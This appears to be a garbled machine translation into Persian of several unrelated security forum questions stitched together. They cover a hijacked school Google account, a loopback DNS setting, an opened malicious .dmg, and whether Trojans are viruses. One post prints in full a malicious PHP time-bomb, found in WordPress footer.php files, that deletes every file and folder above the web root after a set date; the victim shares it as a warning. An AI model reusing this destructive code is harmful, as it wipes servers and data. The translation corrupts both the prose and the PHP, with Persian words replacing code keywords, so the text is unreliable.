ویروس – حساب گوگل خالی از سکنه است؟

نکته جالبی نیست، اما در سطح بی حد و حصر من، عنوان چیزی است که من با آن کنار گذاشته ام. امیدواریم افراد دقیق بتوانند در مسیر درست به من اشاره کنند، بنابراین در اینجا …

یک حساب گوگل که در محیط مدرسه در سامانه kromebooks استفاده شده است، به طرز عجیبی به خطر افتاده است. اسناد و مدارکی که دانشجویان با آن در گوگل درایو / اسناد کار می کنند ویرایش می شوند و تصاویر "ترسناک" همراه با متن متفاوتی وارد می شوند.

تا کنون، رمز عبور تغییر کرده و 2 مجوز عامل مجاز در حساب مجاز نیست اتفاق می افتد بعضی از تست های محدود به من می گویند که تغییر رمز عبور تمام جلسات قبلا وارد شده غیرقابل قبول است، بنابراین اگر این یک دانش آموز یا فرد دیگر در ویرایش در زمان واقعی بود و باعث ایجاد مشکل شد، باید آن را رها کرده و آن را حل کرد. کد مجوز 2 عامل که من آن را آزمایش کردم تنها برای یک ورود به سیستم معتبر است، زیرا تلاش ورود به سیستم ناموفق برای ارسال اعلان به کاربر است. بنابراین من فکر می کنم من رد شد که کسی با یک نام کاربری / رمز عبور مکرر به سرقت رفته وارد شده است، مانند یک شخص دیگر که به دنبال یک شانه و کپی گذرواژه است.

آیا کسی تا به حال از پلاگین / بدافزار / برنامه افزودنی که قصد دارد یک شوخی که این را می خواهد؟ و یا هر چیزی واقعا، هر گونه پیشنهادات دیگر باعث می شود در این نقطه من با درخواست است که IT حذف حساب و شروع تازه … و یا که یک روح است …

با تشکر برای هر گونه کمک

شبکه – چرا ویندوز کامپیوتر من با استفاده از محلی DNS سرور؟

به تازگی یک شبکه شرکتی به ارث رسیده است و یکی از این دستگاه ها دارای خطا در ارتباط با درایوهای شبکه ای نقشه برداری با خطاهای مربوط به زمان سرور متفاوت از زمان رایانه است. این مورد نبود، اما یک فرم را پیدا کردم که مردم آن را به سرور DNS اشتباه نسبت دادند. من تنظیمات DNS را روی کامپیوتر چک کردم و به جای تعجب، سرور DNS به حلقه (127.0.0.1) تنظیم شده بود. من متوجه نشدم کامپیوترهای ویندوز سرور DNS روی آنها نصب شده است.

اولین سوال این رفتار ویندوز پیش فرض است؟

من از شبکه telnet برای تأیید اینکه در واقع یک پروسه پذیرش اتصالات در 127.0.0.1:53 وجود دارد و آن بود.

سوال دوم، آیا باید در مورد چیزی مانند این نگران باشم؟

ویروس – فایل .dmg باز شده است، اما بر روی برنامه در داخل کلیک نکرده اید. من امن هستم

یک فایل غیرمستقیم .dmg (که من کاملا مطمئن هستم مخرب بود) را در MacOS High Sierra دانلود کردم و آن را دوبار کلیک کردم تا آن را باز کند و آن را نصب کند.

دوبار کلیک یا باز کردن واقعی

آیا من امن هستم

اگر نه، چه اقدامات اصلاحی می توانم انجام دهم؟

virus – کد PHP مخرب حذف همه فایل ها در FTP

چند ماه پیش برخی از وبسایتهای من هک شده بودند. FTP ها ظاهرا خالی بودند، هنگام بارگیری سایت ها، خطای 403 را دریافت کردم. اگر سعی کردم پشتیبان گیری FTP ها را بارگیری کنم و فایل سیستم را بررسی کنم، همه فایل ها وجود داشت. با این حال، زمانی که سعی کردم سایت را باز کنم، 403 دریافت کردم و FTP دوباره خالی بود.

من تمام فایل ها را اسکن کرده ام و یک فایل مخرب در فایل های خود پیدا کردم. کد همیشه در فایل footer.php در پوشه تم وردپرس من و همچنین در footer.php در CMS سفارشی من واقع شده است.

کد اساسا فایل سیستم را اسکن می کند، ریشه را پیدا می کند و سپس در زمان مشخص شده خود را اجرا می کند و تمامی فایل ها را حذف می کند. اگر نسخه پشتیبان تهیه کنید، اگر فردی وب سایت را باز کند، دوباره آن را حذف می کند. این چیزی است که کد به نظر می رسد:

 <؟
$ today = تاریخ ("Y-m-d H: i: s")؛
$ date = "2018-05-01 00:00:00"؛

function listFolderFiles ($ dir) {
    $ ffs = scandir ($ dir)؛

    unset ($ ffs [array_search('.', $ffs, true)])؛
    Unset ($ ffs [array_search('..', $ffs, true)])؛

    // جلوگیری از عناصر دستورالعمل خالی
    اگر (count ($ ffs) <1)
        برگشت؛

    foreach ($ ffs به عنوان $ ff) {
        اگر (! is_dir ($ dir. '/'. $ ff)) unlink ($ dir. '/'. $ ff)؛
        اگر (is_dir ($ dir. '/'. $ ff)) listFolderFiles ($ dir. '/'. $ ff)؛
    }
}

تابع rmDirs ($ dir) {
    $ emptyDir = false؛
    $ ffs = scandir ($ dir)؛

    unset ($ ffs [array_search('.', $ffs, true)])؛
    Unset ($ ffs [array_search('..', $ffs, true)])؛

    // جلوگیری از عناصر دستورالعمل خالی
    اگر (count ($ ffs) < 1)
        return true;

    foreach($ffs as $ff) {
        if(is_dir($dir.'/'.$ff)) $emptyDir = rmDirs($dir.'/'.$ff);
        if($emptyDir) {
            if(is_dir($dir.'/'.$ff)) rmdir($dir.'/'.$ff);
            rmDirs($dir);
        }
    }
    return false;
}

if ($today > $ date) {
    listFolderFiles (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
    rmDirs (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
}
؟>

دقیقا همین اتفاق برای من افتاد. اولین بار این تاریخ در نیمه شب به 1 فوریه تنظیم شد و اکنون در نیمه شب به 1 ماه مه تنظیم شده است. کد همیشه در فایل حداقل دو هفته قبل از تاریخ مشخص شده قرار می گیرد. میزبانی وب که من استفاده می کنم، هر روز 14 روز پشتیبان گیری FTP های خود را به صورت خودکار انجام می دهم، بنابراین حدس می زنم این نقطه قرار دادن کد در زمان پیش است.

چیزی که من در مورد هر موضوعی پیدا نکردم این کد خاص، هر تکه ای از آن را آنلاین، بنابراین من حدس می زنم ممکن است به صورت سفارشی نوشته شده است – من در یک سازمان دیجیتال کار می کند، بنابراین احتمالا توسط رقبای کسب و کار ما.

من آن را ثابت کرده ام، ما بهترین ها را برای حفظ این اتفاق می افتد دوباره، اما من می خواهم دیگران در مورد این کد بدانند و برای پیدا کردن آن. همچنین، اگر برخی از منابع شناخته شده این، من می خواهم بدانم. با تشکر!

آیا ویروس تروجان اسب است؟ (یا موضوع بحث است؟)

تروجان یک تروجان است، بدون شک. اما این یک ویروس است؟
در حالی که googled، زیر را دریافت کرد،

اسب تروجان نیز ممکن است به عنوان یک ویروس تروجان شناخته شود، اما
  این از لحاظ فنی نادرست است برخلاف یک ویروس کامپیوتری، یک اسب تروجان است
  قادر به تکثیر خود نیست، و نه می تواند بدون پایان دادن به آن
  کمک کاربر

اما در کتاب Matt Bishop، "امنیت رایانه: هنر و علم"، این می گوید

اسب های تروجان می توانند خود را کپی کنند

  • که بدان معنی است که ویروس است.

آیا این موضوع بحث یا ماده ای از دولت (یعنی به تروجان خاص بستگی دارد که چگونه رفتار می کند، می تواند تکثیر کند یا خیر).